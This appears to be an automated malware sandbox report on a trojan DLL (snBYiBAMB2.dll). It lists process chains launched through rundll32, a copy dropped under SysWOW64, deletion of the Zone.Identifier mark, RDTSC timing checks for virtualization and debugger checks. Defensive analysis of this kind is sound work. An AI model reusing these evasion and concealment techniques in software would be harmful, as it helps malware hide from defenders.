Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_0470F699	15_2_0470F699
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_0470D899	15_2_0470D899
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_0470C69B	15_2_0470C69B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04703085	15_2_04703085
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_0471C772	15_2_0471C772
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04702575	15_2_04702575
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04702176	15_2_04702176
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04702B7C	15_2_04702B7C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04715B7C	15_2_04715B7C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_0470597D	15_2_0470597D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_0471F561	15_2_0471F561
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04722560	15_2_04722560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04709565	15_2_04709565
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04705166	15_2_04705166
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_0470DD66	15_2_0470DD66
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_0470996C	15_2_0470996C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_0470196D	15_2_0470196D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04708D59	15_2_04708D59
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_0470635F	15_2_0470635F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04704F42	15_2_04704F42
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_0471C145	15_2_0471C145
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_0472314A	15_2_0472314A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04722D4F	15_2_04722D4F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04713130	15_2_04713130
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_0470E336	15_2_0470E336
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04707739	15_2_04707739
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_0471473A	15_2_0471473A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04706125	15_2_04706125
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_0471CF2C	15_2_0471CF2C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_0470B12E	15_2_0470B12E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04708112	15_2_04708112
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04705314	15_2_04705314
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04704716	15_2_04704716
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04718518	15_2_04718518
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04723306	15_2_04723306
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_0471D10B	15_2_0471D10B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_0471710D	15_2_0471710D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_047191F7	15_2_047191F7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04701DF9	15_2_04701DF9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04706BFE	15_2_04706BFE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_0471D5FE	15_2_0471D5FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_047235E3	15_2_047235E3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_0470B7EC	15_2_0470B7EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_0470FBEF	15_2_0470FBEF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_047113DB	15_2_047113DB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_0471E7DA	15_2_0471E7DA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_047189DA	15_2_047189DA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04705DC3	15_2_04705DC3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_047039C3	15_2_047039C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04714DC5	15_2_04714DC5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04710FC5	15_2_04710FC5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04702DC5	15_2_04702DC5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_0471BFA1	15_2_0471BFA1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_047177A7	15_2_047177A7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_047033A9	15_2_047033A9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_0470F984	15_2_0470F984
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04721987	15_2_04721987
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04707D87	15_2_04707D87
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_0470938F	15_2_0470938F

Source: C:\Windows\System32\loaddll32.exe	Code function: String function: 6EA14F90 appears 52 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6EA14F90 appears 52 times

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6EA01460 zwijaemkuj,		1_2_6EA01460
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6EA01460 zwijaemkuj,		4_2_6EA01460

Source: C:\Windows\SysWOW64\rundll32.exe

Process Stats: CPU usage > 98%

Source: snBYiBAMB2.dll

Binary or memory string: OriginalFilenameCtqfbxsirs.dll6 vs snBYiBAMB2.dll

Source: C:\Windows\System32\svchost.exe	Section loaded: xboxlivetitleid.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cdpsgshims.dll			Jump to behavior

Source: snBYiBAMB2.dll

Virustotal: Detection: 24%

Source: snBYiBAMB2.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\snBYiBAMB2.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\snBYiBAMB2.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\snBYiBAMB2.dll,Control_RunDLL
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\snBYiBAMB2.dll",#1
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\snBYiBAMB2.dll,awrrqyparpkpycx
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\snBYiBAMB2.dll,bcnxvrdkfysosxtof
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown	Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\snBYiBAMB2.dll",Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gcdru\wqnupsxlnfqvhei.gop",rRrsbNdtBW
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\snBYiBAMB2.dll",Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\snBYiBAMB2.dll",Control_RunDLL
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\snBYiBAMB2.dll",Control_RunDLL
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Gcdru\wqnupsxlnfqvhei.gop",Control_RunDLL
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\snBYiBAMB2.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\snBYiBAMB2.dll,Control_RunDLL	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\snBYiBAMB2.dll,awrrqyparpkpycx	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\snBYiBAMB2.dll,bcnxvrdkfysosxtof	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\snBYiBAMB2.dll",Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\snBYiBAMB2.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gcdru\wqnupsxlnfqvhei.gop",rRrsbNdtBW	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\snBYiBAMB2.dll",Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\snBYiBAMB2.dll",Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\snBYiBAMB2.dll",Control_RunDLL	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Gcdru\wqnupsxlnfqvhei.gop",Control_RunDLL	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: classification engine

Classification label: mal88.troj.evad.winDLL@35/2@0/29

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6EA0AF10 CoCreateInstance,OleRun,

1_2_6EA0AF10

Source: C:\Windows\SysWOW64\rundll32.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\snBYiBAMB2.dll,Control_RunDLL

Source: C:\Windows\System32\conhost.exe

Mutant created: \BaseNamedObjects\Local\SM0:4544:120:WilError_01

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6EA057C0 GetTickCount64,FindResourceA,

1_2_6EA057C0

Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK

Source: snBYiBAMB2.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: snBYiBAMB2.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: snBYiBAMB2.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: snBYiBAMB2.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: snBYiBAMB2.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: snBYiBAMB2.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6EA14FE0 push ecx; ret	1_2_6EA14FF3
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6EA373E1 push ecx; ret	1_2_6EA373F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_02F1151C push ds; ret	4_2_02F11527
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_02F1150F push ds; ret	4_2_02F11527
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6EA14FE0 push ecx; ret	4_2_6EA14FF3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6EA0E240 push esi; ret	4_2_6EA0E242
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6EA373E1 push ecx; ret	4_2_6EA373F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0040150F push ds; ret	5_2_00401527
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0040151C push ds; ret	5_2_00401527
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_02CB150F push ds; ret	8_2_02CB1527
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_02CB151C push ds; ret	8_2_02CB1527
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_0470151C push ds; ret	15_2_04701527
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_0470150F push ds; ret	15_2_04701527

Source: snBYiBAMB2.dll

Static PE information: real checksum: 0x80fdc should be: 0x7ce11

Source: C:\Windows\SysWOW64\rundll32.exe

PE file moved: C:\Windows\SysWOW64\Gcdru\wqnupsxlnfqvhei.gop

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe

File opened: C:\Windows\SysWOW64\Gcdru\wqnupsxlnfqvhei.gop:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 000000006EA06300 second address: 000000006EA0633E instructions: 0x00000000 rdtscp 0x00000003 mov dword ptr [esp+000000D8h], ecx 0x0000000a test edx, edx 0x0000000c jne 00007FCC48AEDA29h 0x0000000e mov edi, 05AF0528h 0x00000013 mov dword ptr [esp+10h], edi 0x00000017 rdtscp
Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 000000006EA06300 second address: 000000006EA0633E instructions: 0x00000000 rdtscp 0x00000003 mov dword ptr [esp+000000D8h], ecx 0x0000000a test edx, edx 0x0000000c jne 00007FCC48AC4769h 0x0000000e mov edi, 05AF0528h 0x00000013 mov dword ptr [esp+10h], edi 0x00000017 rdtscp
Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 000000006EA07995 second address: 000000006EA079BD instructions: 0x00000000 rdtscp 0x00000003 test edx, edx 0x00000005 jne 00007FCC48AEDA1Eh 0x00000007 mov ebx, 0544B55Bh 0x0000000c rdtscp
Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 000000006EA07995 second address: 000000006EA079BD instructions: 0x00000000 rdtscp 0x00000003 test edx, edx 0x00000005 jne 00007FCC48AC475Eh 0x00000007 mov ebx, 0544B55Bh 0x0000000c rdtscp
Source: C:\Windows\System32\loaddll32.exe	RDTSC instruction interceptor: First address: 000000006EA06300 second address: 000000006EA0633E instructions: 0x00000000 rdtscp 0x00000003 mov dword ptr [esp+000000D8h], ecx 0x0000000a test edx, edx 0x0000000c jne 00007FCC48AEDA29h 0x0000000e mov edi, 05AF0528h 0x00000013 mov dword ptr [esp+10h], edi 0x00000017 rdtscp
Source: C:\Windows\System32\loaddll32.exe	RDTSC instruction interceptor: First address: 000000006EA07995 second address: 000000006EA079BD instructions: 0x00000000 rdtscp 0x00000003 test edx, edx 0x00000005 jne 00007FCC48AC475Eh 0x00000007 mov ebx, 0544B55Bh 0x0000000c rdtscp

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6EA062C0 rdtscp

1_2_6EA062C0

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6EA2BA20 FindFirstFileExW,		1_2_6EA2BA20
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6EA2BA20 FindFirstFileExW,		4_2_6EA2BA20

Source: C:\Windows\SysWOW64\rundll32.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: svchost.exe, 00000006.00000002.799830333.0000027046841000.00000004.00000001.sdmp, svchost.exe, 00000009.00000002.799410994.00000207A9429000.00000004.00000001.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6EA14E67 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

1_2_6EA14E67

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6EA1744C GetProcessHeap,HeapFree,

1_2_6EA1744C

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6EA062C0 rdtscp

1_2_6EA062C0

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6EA062C0 mov eax, dword ptr fs:[00000030h]	1_2_6EA062C0
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6EA062C0 mov eax, dword ptr fs:[00000030h]	1_2_6EA062C0
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6EA24F94 mov eax, dword ptr fs:[00000030h]	1_2_6EA24F94
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6EA07A30 mov eax, dword ptr fs:[00000030h]	1_2_6EA07A30
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6EA2B715 mov eax, dword ptr fs:[00000030h]	1_2_6EA2B715
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6EA17334 mov esi, dword ptr fs:[00000030h]	1_2_6EA17334
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_02F24315 mov eax, dword ptr fs:[00000030h]	4_2_02F24315
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6EA062C0 mov eax, dword ptr fs:[00000030h]	4_2_6EA062C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6EA062C0 mov eax, dword ptr fs:[00000030h]	4_2_6EA062C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6EA24F94 mov eax, dword ptr fs:[00000030h]	4_2_6EA24F94
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6EA07A30 mov eax, dword ptr fs:[00000030h]	4_2_6EA07A30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6EA2B715 mov eax, dword ptr fs:[00000030h]	4_2_6EA2B715
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6EA17334 mov esi, dword ptr fs:[00000030h]	4_2_6EA17334
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00414315 mov eax, dword ptr fs:[00000030h]	5_2_00414315
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_02CC4315 mov eax, dword ptr fs:[00000030h]	8_2_02CC4315
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04714315 mov eax, dword ptr fs:[00000030h]	15_2_04714315

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6EA14E67 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_6EA14E67
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6EA1461A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_6EA1461A
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6EA1D436 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_6EA1D436
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6EA14E67 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_6EA14E67
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6EA1461A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_6EA1461A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6EA1D436 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_6EA1D436

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\snBYiBAMB2.dll",#1

Jump to behavior

Source: rundll32.exe, 0000001D.00000002.798403758.0000000002C70000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: rundll32.exe, 0000001D.00000002.798403758.0000000002C70000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 0000001D.00000002.798403758.0000000002C70000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: rundll32.exe, 0000001D.00000002.798403758.0000000002C70000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,	1_2_6EA34EAC
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,	1_2_6EA2CE41
Source: C:\Windows\System32\loaddll32.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	1_2_6EA34F7F
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,	1_2_6EA34C7C
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	1_2_6EA34DA4
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	1_2_6EA34A27
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	1_2_6EA348B6
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,	1_2_6EA3480D
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	1_2_6EA2C982
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	1_2_6EA3499C
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	1_2_6EA34901
Source: C:\Windows\System32\loaddll32.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	1_2_6EA34610
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	4_2_6EA34EAC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	4_2_6EA2CE41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	4_2_6EA34F7F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	4_2_6EA34C7C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	4_2_6EA34DA4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	4_2_6EA34A27
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	4_2_6EA348B6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	4_2_6EA3480D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	4_2_6EA2C982
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	4_2_6EA3499C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	4_2_6EA34901
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	4_2_6EA34610

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6EA14C86 cpuid

1_2_6EA14C86

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6EA14FF7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

1_2_6EA14FF7

Lowering of HIPS / PFW / Operating System Security Settings:

Changes security center settings (notifications, updates, antivirus, firewall)

Show sources

Source: C:\Windows\System32\svchost.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval

Jump to behavior

Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

